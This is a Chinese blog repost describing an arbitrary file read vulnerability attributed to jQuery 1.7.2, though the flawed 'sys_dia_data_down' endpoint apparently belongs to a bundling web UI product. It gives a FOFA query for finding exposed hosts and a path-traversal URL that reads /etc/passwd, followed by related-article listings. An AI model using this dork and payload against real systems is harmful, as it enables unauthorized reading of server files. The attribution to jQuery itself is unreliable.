jQuery-1.7.2版本存在任意文件读取漏洞

最新推荐文章于 2023-12-27 18:22:07 发布
最新推荐文章于 2023-12-27 18:22:07 发布
阅读量309 收藏
点赞数
分类专栏: web安全 文章标签: jquery javascript ecmascript
原文链接:https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247483871&idx=1&sn=482fab4e1d1cdee9a3c4bb1eae784e18&chksm=974b8cd8a03c05ce360ba0381e8813b3a7821ee4cf9b6ed8b80c909086bb8a1266d7f3d84f0c&mpshare=1&scene=23&srcid=0426ztD4xMusJGm0NEHCdXTL&sharer_sharetim
版权

本文转载于:https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247483871&idx=1&sn=482fab4e1d1cdee9a3c4bb1eae784e18&chksm=974b8cd8a03c05ce360ba0381e8813b3a7821ee4cf9b6ed8b80c909086bb8a1266d7f3d84f0c&mpshare=1&scene=23&srcid=0426ztD4xMusJGm0NEHCdXTL&sharer_sharetime=1682562607401&sharer_shareid=e065963f591f1d96b07207551473e96d#rd

1. jQuery-1.7.2简介

该文章 南风漏洞复现文库 公众号首发

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。

2.漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。

3.影响版本

jQuery-1.7.2

4.fofa 查询语句

body="webui/js/jquerylib/jquery-1.7.2.min.js"

5.漏洞复现

漏洞链接:

https://127.0.0.1/webui/?g=sys_dia_data_down&file_name=../../../../../etc/passwd

在这里插入图片描述

在这里插入图片描述

zxl2605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】jQuery-1.7.2 版本任意文件下载漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-27 2086
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后一个优秀的JavaScript代码库(框架) 于2006年1月由John Resig发布。 jQuery设计的宗旨是 " write Less,Do More" ,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、时间处理、动画设计和Ajax交互。
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
jquery-1.7.2.min.js XSS漏洞
ZPFCD的博客
01-19 2599
JQuery 1.7.2.min.js存在xss漏洞
jQuery-1.7.2存在任意文件读取漏洞
最新发布
fly夏天的博客
12-27 971
文章复现了jQuery-1.7.2存在任意文件读取漏洞。并提供了简单的利用方法
jQuery
m0_72041293的博客
03-28 219
素下匹配所有的后代元素。可以设置和获取属性的值,只推荐操作checked、readOnly、selected、disabled等等。[attribute^=value] 匹配给定的属性是以。[attribute$=value] 匹配给定的属性是以。可以设置和获取属性的值,不推荐操作checked、readOnly、selected、disabled等。[attribute!one 方法绑定的事件。
Jquery的运用
英雄主义
08-14 1429
1.首先建一个文件夹,在文件夹里面添加JQuery的插件 “ jquery-1.7.2.min.js ”     2.在html页面去引用这个JQuery插件,并将需要使用JS脚本的JS页面引用也添加到页面中 JqueryStudy //"JQuery的插件" //JS页面
任意文件读取漏洞
m0_57276420的博客
04-08 5647
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
WEB界面jquery1.7.2版本升级到jquery3.6版本需要注意的问题
pow8368684的专栏
05-26 1515
$.size();需要更改为$.length; 原因:1.8版本的时候$.size()被废弃 页面加载的时候,$(function(){})与onload=""谁先执行的问题。 jquery1.7.2版本:$(function(){})函数比onload=""先执行 jquery3.6版本:onload=""函数比 $(function(){})先执行 ...
jQuery 1.7.2 正式版, jquery 1.7.2 min.js
06-15
jQuery 1.7.2正式版发布。该版本1.7.1的基础上修复了大量的bug,并改进了部分功能。而相比于1.7.2 RC1,只修复了一个bug。值得注意的是:如果你正在使用jQuery Mobile,请使用最新的jQuery 1.7.2和jQuery Mobile 1.1这两个版本,因为之前的jQuery Mobile版本还基于jQuery core 1.7.1或更早的版本jquery-1.7.2.min.js (minified, production) jquery-1.7.2.js (unminified, debug) jQuery 1.7 正式版已经可以下载使用。jQuery是一个JavaScript库,它简化了HTML文档遍历,事件处理,动画和为网络快速发展的Ajax交互。jQuery 1.7 版本加入了新的事件API .on() 和 .off(),提高了性能,以及为旧版IE浏览器提供了更好的HTML5支持。 同时 Google 及 Microsoft CDN 上的新版本也应该会在一两天内部署完毕。
jquery-1.7.2.js 、jquery-1.7.2.min.js 【官方jquery包 js】
11-01
jquery-1.7.js 、jquery-1.7.2.min.js 【官方jquery包 js】
ajaxfileupload and jquery 1.7.2
02-12
ajaxfileupload and jquery 1.7.2 进过测试可用的。
jquery-1.7.2.js免费下载
10-25
Query 1.7.2正式版发布。该版本1.7.1的基础上修复了大量的bug,并改进了部分功能。而相比于1.7.2 RC1,只修复了一个bug。值得注意的是:如果你正在使用jQuery Mobile,请使用最新的jQuery 1.7.2和jQuery Mobile 1.1这两个版本,因为之前的jQuery Mobile版本还基于jQuery core 1.7.1或更早的版本jquery-1.7.2.min.js (minified, production) jquery-1.7.2.js (unminified, debug) jQuery 1.7 正式版已经可以下载使用。jQuery是一个JavaScript库,它简化了HTML文档遍历,事件处理,动画和为网络快速发展的Ajax交互。jQuery 1.7 版本加入了新的事件API .on() 和 .off(),提高了性能,以及为旧版IE浏览器提供了更好的HTML5支持。 同时 Google 及 Microsoft CDN 上的新版本也应该会在一两天内部署完毕
jquery 1.7.2
07-19
jquery-1.7.2.js jquery-1.7.2.min.js jquery-1.7.2-vsdoc.js
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 2543
该篇记录了Web漏洞-任意文件读取漏洞
jquery1.7.2中文版
01-19
Query是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(或JavaScript框架)。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。
jquery1.7有感(2)
fjzf2004的专栏
06-07 304
v1.7.2 Wed Mar 21 12:46:34 2012 -0700 322行是一个重点: // Give the init function the jQuery prototype for later instantiation jQuery.fn.init.prototype = jQuery.fn;(引用内容) 在已知jQuery.fn=jQuery.prototype的
jquery.tablesorter.js:638 Uncaught TypeError: Cannot read properties of undefined (reading 'type') at multisort (jquery.tablesorter.js:638:54) at HTMLTableElement.<anonymous> (jquery.tablesorter.js:855:45) at HTMLTableElement.dispatch (jquery-1.7.2.js:3332:9) at HTMLTableElement.eventHandle (jquery-1.7.2.js:2941:28) at Object.trigger (jquery-1.7.2.js:3210:12) at HTMLTableElement.<anonymous> (jquery-1.7.2.js:3869:17) at Function.each (jquery-1.7.2.js:660:20) at init.each (jquery-1.7.2.js:271:17) at init.trigger (jquery-1.7.2.js:3868:15) at HTMLTableElement.<anonymous> (jquery.tablesorter.js:869:31) 这个报错啥原因
07-13
有时,不同版本的插件可能需要特定版本jQuery 才能正常工作。你可以查看 TableSorter 插件的文档或官方网站,了解它所需的最低 jQuery 版本。 3. 确保正确初始化 TableSorter 插件。在加载完 TableSorter 插件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值